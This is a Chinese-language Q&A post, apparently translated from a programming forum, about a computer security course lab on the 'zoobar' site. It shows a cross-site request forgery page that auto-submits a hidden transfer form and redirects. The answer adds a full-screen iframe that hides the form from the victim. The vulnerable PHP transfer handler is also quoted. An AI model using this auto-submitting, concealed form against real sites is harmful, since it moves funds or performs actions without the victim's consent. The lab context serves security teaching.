这是关于我正在进行的计算机安全课程的问题。
我有以下工作HTML文档,只需为我提交表单:
<form method="POST" name="transferform"
action="http://dasak.csc.kth.se/zoobar/transfer.php">
<p>Send <input name="zoobars" type=text value="1" size=5> </p>
<p>to <input name="recipient" type=text value="sahand" size=10></p>
<input type=submit name="submission" value="Send">
</form>
<script>
document.getElementsByName("submission")[0].click();
location.replace("http://dasak.csc.kth.se")
</script>
现在我想隐藏iframe背后的表单。我已经按照互联网上的其他解决方案提出了这个问题:
<iframe src = "http://www.kth.se">
<form method="POST" name="transferform"
action="http://dasak.csc.kth.se/zoobar/transfer.php">
<p>Send <input name="zoobars" type=text value="1" size=5> </p>
<p>to <input name="recipient" type=text value="sahand" size=10></p>
<input type=submit name="submission" value="Send">
</form>
<script>
document.getElementsByName("submission")[0].click();
location.replace("http://dasak.csc.kth.se");
</script>
</iframe>
和此:
<iframe src = "http://www.kth.se">
<form method="POST" name="transferform"
action="http://dasak.csc.kth.se/zoobar/transfer.php">
<p>Send <input name="zoobars" type=text value="1" size=5> </p>
<p>to <input name="recipient" type=text value="sahand" size=10></p>
<input type=submit name="submission" value="Send">
</form>
</iframe>
<script>
document.getElementsByName("submission")[0].click();
</script>
,它们之间的唯一区别是关闭iframe代码的位置。
我的问题是,当我用浏览器(支持iframe)打开文档时,我看到了iframe,但是我没有从提交带有document.getElementsByName("submission")[0].click();行的表单中获得我想要的效果。提交由transfer.php文件中的网站处理,其相关部分为:
<?php
require_once("includes/common.php");
nav_start_outer("Transfer");
nav_start_inner();
if($_POST['submission']) {
$recipient = $_POST['recipient'];
$zoobars = (int) $_POST['zoobars'];
$sql = "SELECT Zoobars FROM Person WHERE Username='" .
addslashes($user->username) . "'";
$rs = $db->executeQuery($sql);
$sender_balance = $rs->getValueByNr(0,0) - $zoobars;
$sql = "SELECT Username, Zoobars FROM Person WHERE Username='" .
addslashes($recipient) . "'";
$rs = $db->executeQuery($sql);
$recipient_exists = $rs->getValueByNr(0,0);
if($zoobars > 0 && $sender_balance >= 0 && $recipient_exists) {
$sql = "UPDATE Person SET Zoobars = $sender_balance " .
"WHERE Username='" . addslashes($user->username) . "'";
$db->executeQuery($sql);
$sql = "SELECT Zoobars FROM Person WHERE Username='".
addslashes($recipient) . "'";
$rs = $db->executeQuery($sql);
$recipient_balance = $rs->getValueByNr(0,0) + $zoobars;
$sql = "UPDATE Person SET Zoobars = $recipient_balance " .
"WHERE Username='" . addslashes($recipient) . "'";
$db->executeQuery($sql);
$result = "Sent $zoobars zoobars";
}
else $result = "Transfer to $recipient failed.";
}
?>
据我所知,我制作的HTML文档在没有iframe的情况下工作,我相信脚本的执行在某种程度上受到iframe的阻碍或改变。有没有人知道这是不是真的?如果没有,这种改变或非功能性的原因是什么?
答案 0 :(得分:0)
如果我说得对,你想隐藏iframe背后的表格。
所以
<form method="POST" name="transferform"
action="http://dasak.csc.kth.se/zoobar/transfer.php">
<p>Send <input name="zoobars" type=text value="1" size=5> </p>
<p>to <input name="recipient" type=text value="sahand" size=10></p>
<input type=submit name="submission" value="Send">
</form>
<iframe style="background-color:grey;display:block;position:fixed;top:0px;left:0px;right:0px;bottom:0px;z-index:9999"></iframe>
<script>
document.getElementsByName("submission")[0].click();
location.replace("http://dasak.csc.kth.se")
</script>